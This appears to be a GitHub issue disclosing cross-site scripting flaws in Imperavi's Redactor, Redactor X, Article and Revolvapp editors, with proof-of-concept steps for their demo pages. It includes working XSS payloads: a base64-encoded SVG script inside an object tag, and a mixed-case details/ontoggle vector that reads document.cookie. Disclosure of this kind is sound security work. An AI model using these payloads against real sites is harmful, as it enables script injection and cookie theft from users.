-
Notifications
You must be signed in to change notification settings - Fork 82
Open
Description
Impact
- XSS in Redactor, Redactor X, Article, Revolvapp
Steps to reproduce
POC
Redactor
- access editor page: https://imperavi.com/redactor/
- click HTML code and insert XSS script
script:><object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KDQ1KTs8L3NjcmlwdD48L3N2Zz4=">
- XSS
Redactor X, Article
- access editor page: https://imperavi.com/redactorx/ and https://imperavi.com/article/
- click HTML code and insert XSS script
script:<object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCdYU1MnKTs8L3NjcmlwdD48L3N2Zz4=">
- XSS
Revolvapp
- access editor page: https://imperavi.com/revolvapp/
- click HTML code and insert XSS script
script:<details open ontoggle=alert(document.cookie)>xss</details> <dETAILS/open/onToGgle=a=prompt,a(document.cookie) x>
- XSS
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels





